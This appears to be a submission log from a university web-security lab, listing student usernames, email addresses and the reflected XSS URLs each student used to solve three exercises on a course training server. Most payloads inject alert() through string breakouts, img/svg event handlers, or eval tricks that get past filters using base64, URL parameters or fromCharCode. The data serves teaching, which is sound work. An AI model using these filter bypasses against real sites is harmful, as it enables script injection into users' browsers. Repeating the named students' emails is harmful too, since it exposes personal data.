✅ | Grei | ex4_3 | greis.sava@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(404); | |
✅ | nalanO | ex4_1 | nalan.olgun@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1);" | |
✅ | joypadua | ex4_1 | princess.padua@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1);" | |
✅ | joypadua | ex4_2 | princess.padua@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php%20><img%20src=x%20onerror=alert(1)> | |
✅ | vittoriabassi | ex4_1 | vittoria.bassi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert('livello1');//" | |
✅ | vittoriabassi | ex4_2 | vittoria.bassi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?echo(><img%20src="x"%20onerror=alert('livello_2')>?> | |
✅ | vittoriabassi | ex4_3 | vittoria.bassi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.slice(1)))#YWxlcnQoJ2xpdmVsbG9fMycp | |
✅ | lorenzovivaz | ex4_2 | lorenzo.vivarelli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=xss=<?echo(><img src="x" onerror=alert('level_2')>?> | |
✅ | joypadua | ex4_3 | princess.padua@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(new%20URL(location).searchParams.get(1))&1=alert(1) | |
✅ | lorenzovivaz | ex4_3 | lorenzo.vivarelli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=xss=eval(atob(location.hash.slice(1)))#YWxlcnQoJ2xpdmVsbG9fMycp | |
✅ | SaraSalv | ex4_1 | sara.salvini1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("SaraSalvini");" | |
✅ | SaraSalv | ex4_2 | sara.salvini1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><svg onload=alert("SaraSalvini")> | |
✅ | SaraSalv | ex4_3 | sara.salvini1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=";alert("SaraSalvini");" | |
✅ | nalanO | ex4_2 | nalan.olgun@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php%20><img%20src=x%20onerror=alert(1)> | |
✅ | nalanO | ex4_3 | nalan.olgun@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(new%20URL(location).searchParams.get(1))&1=alert(1) | |
✅ | Alessio27 | ex4_3 | alessio.mandaglio@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(1) | |
✅ | bibo | ex4_1 | filippo.pruzzi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert('level_1');" | |
✅ | bibo | ex4_2 | filippo.pruzzi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?echo(><img src="" onerror=alert('level_2')> | |
✅ | bibo | ex4_3 | filippo.pruzzi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.slice(1)))#YWxlcnQoJ2xldmVsXzMnKQ== | |
✅ | AlessiaS | ex4_1 | alessia.schiavone@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert("1");" | |
✅ | AlessiaS | ex4_2 | alessia.schiavone@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><svg%20onload=alert("2")> | |
✅ | pietro.marseguerra | ex4_1 | pietro.marseguerra@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1)// | |
✅ | pietro.marseguerra | ex4_2 | pietro.marseguerra@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php><img src=x onerror=alert(1)> | |
✅ | pietro.marseguerra | ex4_3 | pietro.marseguerra@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(new%20URL(location).searchParams.get(1))&1=eval(String.fromCharCode(97,108,101,114,116,40,49,41)) | |
✅ | AlessiaS | ex4_3 | alessia.schiavone@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;;;;;;;alert(3); | |
✅ | Alessio | ex4_2 | alessio.prampolini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><svg%20onload=alert("2")> | |
✅ | Alessio | ex4_3 | alessio.prampolini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;;;;;;;alert(3); | |
✅ | Alessio | ex4_1 | alessio.prampolini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert("1");" | |
✅ | tonypalmisano | ex4_1 | tony.palmisano@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=b=";alert(1);" | |
✅ | tonypalmisano | ex4_2 | tony.palmisano@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php ?><img src=x onerror=alert(1)> | |
✅ | francesconegrini | ex4_1 | francesco.negrini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";%20alert(1);%20" | |
✅ | maissa_bouazizi | ex4_1 | maissa.bouazizi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1);" | |
✅ | maissa_bouazizi | ex4_2 | maissa.bouazizi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php><audio%20src="x"%20onerror="alert(%271%27)"%20> | |
✅ | maissa_bouazizi | ex4_3 | maissa.bouazizi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.slice(39))&x=alert(1) | |
✅ | Matteo | ex4_3 | matteo.rota9@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(String.fromCharCode(97,108,101,114,116))(3) | |
✅ | francesconegrini | ex4_2 | francesco.negrini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php><img%20src="x"%20onerror="alert(1)"> | |
✅ | francesconegrini | ex4_3 | francesco.negrini@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(new%20URL(location).searchParams.get(1))&1=alert(1) | |
✅ | Riccardo.Pasquino | ex4_1 | riccardo.pasquino@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1)//" | |
✅ | Riccardo.Pasquino | ex4_2 | riccardo.pasquino@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?%20><img%20src=p%20onerror=alert(1)> | |
✅ | Riccardo.Pasquino | ex4_3 | riccardo.pasquino@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;alert("1"); | |
✅ | mary__ | ex4_1 | marianna.malvisi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert(1)// | |
✅ | davies83 | ex4_1 | davide.martino@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=<script>alert('xssfound');</script> | |
✅ | davies83 | ex4_2 | davide.martino@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<script>alert("xssfound") | |
✅ | Filippo | ex4_2 | filippo.moscatelli1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php><svg%20onload="alert(%27EX2%27)"> | |
✅ | nicolas_r | ex4_3 | nicolas.romagnoli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;alert(1); | |
✅ | nicolas_r | ex4_2 | nicolas.romagnoli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><img%20src=x%20onerror=alert(1)> | |
✅ | nicolas_r | ex4_1 | nicolas.romagnoli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1)// | |
✅ | nicola_razvan_danciu | ex4_2 | nicolarazvan.danciu@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?php><svg%20onload="alert(2)"> | |
✅ | clipper | ex4_1 - Risolto | giuseppe.pugliese2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=abc";alert("attenzione"); val="abc | |
✅ | clipper | ex4_2 - Risolto | giuseppe.pugliese2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert("Attenzione")> | |
✅ | TuxAlex | ex4_3 | alessandro.virgilio1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.substr(1)))#YWxlcnQoKQ== | |
✅ | clipper | ex4_3 - Risolto | giuseppe.pugliese2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(1); | |
✅ | FedriDJaeger | ex4_1 | filippo.fedrigolli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=%22;alert();// | |
✅ | FedriDJaeger | ex4_2 | filippo.fedrigolli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?>"<img src=x onerror=alert()>" | |
✅ | FedriDJaeger | ex4_3 | filippo.fedrigolli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(); | |
✅ | davies83 | ex4_3 | davide.martino@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob('dmFyIGE9YWxlcnQ7YSgxKTs=')) | |
✅ | Francescafedi | ex4_1 | francesca.fedi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=alert(1) | |
✅ | kayy | ex4_1 | karima.jarmouni@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1)// | |
✅ | khadijaezrouri | ex4_1 | khadija.ezrouri@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("KhadijaEzrouri");" | |
✅ | khadijaezrouri | ex4_2 | khadija.ezrouri@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert("KhadijaEzrouri")> | |
✅ | khadijaezrouri | ex4_3 | khadija.ezrouri@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(170602); | |
✅ | Francescafedi | ex4_2 | francesca.fedi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<img src=x onerror=alert(1)> | |
✅ | Francescafedi | ex4_3 | francesca.fedi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.slice(1)))#YWxlcnQoJ2xldmVsXzMnKQ== | |
✅ | andrealosito | ex4_2 | andrea.losito@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=%3C?%3E%3Cimg%20src=x%20onerror=alert(%22allerta%22)%3E | |
✅ | gue.rine | ex4_1 | houssem.guerine@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=%22;alert(%22HoussemGuerine%22);%22 | |
✅ | Federico.Cerutti | ex4_1 | federico.cerutti1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=%22;alert(%22FedericoCerutti%22);%22 | |
✅ | gue.rine | ex4_2 | houssem.guerine@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=%3C?%3E%3Csvg%20onload=alert(%22HoussemGuerine%22)%3E | |
✅ | Federico.Cerutti | ex4_2 | federico.cerutti1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=%3C?%3E%3Csvg%20onload=alert(%22FedericoCerutti%22)%3E | |
✅ | gue.rine | ex4_3 | houssem.guerine@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(240601); | |
✅ | Federico.Cerutti | ex4_3 | federico.cerutti1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(101003); | |
✅ | Cristian | ex4_2 - Cristian Dicio | cristian.dicillo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=?xss=<?><svg onload=alert("dicio_ex4_2")> | |
✅ | Loca | ex4_1 | matteo.locatelli10@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=%22;alert(%22MatteoLocatelli%22);%22 | |
✅ | Loca | ex4_2 | matteo.locatelli10@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=%3C?%3E%3Csvg%20onload=alert(%22MatteoLocatelli%22)%3E | |
✅ | Loca | ex4_3 | matteo.locatelli10@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(140901); | |
✅ | biongiorgioo | ex4_1 | giorgio.biondillo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert("biongiorgioo");" | |
✅ | biongiorgioo | ex4_2 | giorgio.biondillo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><svg%20onload=alert("biongiorgioo")> | |
✅ | biongiorgioo | ex4_3 | giorgio.biondillo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert(`biongiorgioo`); | |
✅ | nicola_razvan_danciu | EX4_3 | nicolarazvan.danciu@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(230701); | |
✅ | nicola_razvan_danciu | EX4_3 | nicolarazvan.danciu@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(230701); | |
✅ | lorenzovivaz | ex4_1 | lorenzo.vivarelli@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=b=";alert('level_1');//" | |
✅ | nohaa | ex4_1 | nohayla.nadir@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("NohaNadir");" | |
✅ | nohaa | ex4_2 | nohayla.nadir@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("NohaNadir")> | |
✅ | nohaa | ex4_3 | nohayla.nadir@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(180902) | |
✅ | giobon | ex4_2 | giovanni.bongiorno@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=%3C?%3E%3Csvg%20onload=alert(%22giobon%22)%3E | |
✅ | kristianfabbro | ex4_1 | kristian.fabbro@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=/?b=abc";alert("attenzione");%20val="abc | |
✅ | kristianfabbro | ex4_2 | kristian.fabbro@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert("XSS")> | |
✅ | kristianfabbro | ex4_3 | kristian.fabbro@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(3); | |
✅ | AngeloAlfano | ex4_1 | angelo.alfano@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert(1);// | |
✅ | sergiocolombo | ex4_1 | sergio.colombo2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("attento%20ai%20virus");// | |
✅ | sergiocolombo | ex4_2 | sergio.colombo2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<style%20onload=alert(1)> | |
✅ | AngeloAlfano | ex4_2 | angelo.alfano@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><img%20src="image.gif"%20onerror="alert(1)"> | |
✅ | Filippo | ex4_3 | filippo.moscatelli1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(String.fromCharCode(97,108,101,114,116))(3) | |
✅ | AngeloAlfano | ex4_3 | angelo.alfano@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(String.fromCharCode(97,108,101,114,116))(1) | |
✅ | sergiocolombo | ex4_3 | sergio.colombo2@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(String.fromCharCode(97,108,101,114,116))(1) | |
✅ | giorgio | ex4_2 | giorgio.sironi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?echo(><img src="x" onerror=alert()>?> | |
✅ | giorgio | ex4_1 | giorgio.sironi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1);// | |
✅ | giorgio | ex4_3 | giorgio.sironi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.slice(1)))#YWxlcnQoMSk= | |
✅ | Gabriele_Nicchi | ex4_1 | gabriele.nicchi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=alert(1) | |
✅ | Gabriele_Nicchi | ex4_2 | gabriele.nicchi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<img src=x onerror=alert(1)> | |
✅ | Mattia_Stellato | ex4_1 | mattia.stellato@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("1");" | |
✅ | Mattia_Stellato | ex4_2 | mattia.stellato@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert("2")> | |
✅ | Mattia_Stellato | ex4_3 | mattia.stellato@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;alert("3"); | |
✅ | tonypalmisano | ex4_3 | tony.palmisano@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=xss=eval(String.fromCharCode(97,108,101,114,116))(1) | |
✅ | simoneantoniciello | ex4_1 | simonemichele.antoniciello@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=b=";alert('SIMONE1');" | |
✅ | simoneantoniciello | ex4_2 | simonemichele.antoniciello@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=xss=<?echo(><img src="x" onerror=alert('SIMONE2')>?> | |
✅ | simoneantoniciello | ex4_3 | simonemichele.antoniciello@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=xss=eval(atob(location.hash.slice(1)))#YWxlcnQoJ1NJTU9ORTMnKQ== | |
✅ | Gabriele_Nicchi | ex4_3 | gabriele.nicchi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(atob(location.hash.slice(1)))#YWxlcnQoJ2xldmVsXzMnKQ== | |
✅ | Luigi | ex4_1 | luigi.manci@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=b=";alert('level_1');" | |
✅ | Luigi | ex4_2 | luigi.manci@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=xss=<?echo(><img src="x" onerror=alert('level_2')>?> | |
✅ | Luigi | ex4_3 | luigi.manci@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=xss=eval(atob(location.hash.slice(1)))#YWxlcnQoJ2xpdmVsbG9fMycp | |
✅ | federico.brunella | ex4_1 | federico.brunella@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("FedericoBrunella");" | |
✅ | federico.brunella | ex4_2 | federico.brunella@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("FedericoBrunella")> | |
✅ | federico.brunella | ex4_3 | federico.brunella@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(101103) | |
✅ | Inna | ex4_1 | alessandro.innante@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("AlessandroInnante");" | |
✅ | Inna | ex4_2 | alessandro.innante@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg onload=alert("AlessandroInnante")> | |
✅ | Inna | ex4_3 | alessandro.innante@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(121103); | |
✅ | Alessia | ex4_2 | alessia.ferrari18@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php><svg%20onload="alert(%27es2%27)"> | |
✅ | Alessia | ex4_3 | alessia.ferrari18@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(String.fromCharCode(97,108,101,114,116))(3) | |
✅ | mirco.caputo | ex4_1 | mirco.caputo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("MircoCaputo");" | |
✅ | mirco.caputo | ex4_2 | mirco.caputo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><svg onload=alert("MircoCaputo")> | |
✅ | mirco.caputo | ex4_3 | mirco.caputo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(50));;;;;;;;;;;;;;alert(280596); | |
✅ | sbusso | Ex4_1 | simone.busso@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=";alert(1);v="` | |
✅ | sbusso | Ex4_2 | simone.busso@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?><img%20src=x%20onerror=alert(1)> | |
✅ | sbusso | Ex4_3 | simone.busso@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(String.fromCharCode(97,108,101,114,116))(1) | |
✅ | simonecesareo | ex4_1 | simone.cesareo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=&b=%22;alert(%27VULNERABILITA%20SFRUTTATA%27);// | |
✅ | LVOLPI | ex4_1 | lorenzo.volpi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=;alert(1);// | |
✅ | LVOLPI | ex4_2 | lorenzo.volpi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=<?php><img%20src=""%20onerror=alert(1)> | |
✅ | LVOLPI | ex4_3 | lorenzo.volpi@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;alert(1); | |
✅ | emahaky | ex4_1 | emanuele.moro1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_1?b=?b=";alert("pollO");z="// | |
✅ | emahaky | ex4_2 | emanuele.moro1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=?xss=<?><svg%20onload=alert("pillole")> | |
✅ | simonecesareo | ex4_2 | simone.cesareo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><svg%20onload=alert("VULNERABILITA_TROVATA")> | |
✅ | emahaky | ex4_3 | emanuele.moro1@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(String.fromCharCode(97,108,101,114,116))(3) | |
✅ | giu_agoz | ex4_2 | giulia.agozzino@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_2?xss=?xss=<?><img%20src=x%20onerror=alert(1)> | |
✅ | giu_agoz | ex4_3 | giulia.agozzino@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=?xss=eval(String.fromCharCode(97,108,101,114,116))(1) | |
✅ | simonecesareo | ex4_3 | simone.cesareo@studenti.unimi.it | https://socialnetwork.laser.di.unimi.it/fsd_lab/ex4_3?xss=eval(location.search.substr(55));;;;;;;;;;;;;;;;;;;;;;;;;;;;alert(`VULN_TROV`); |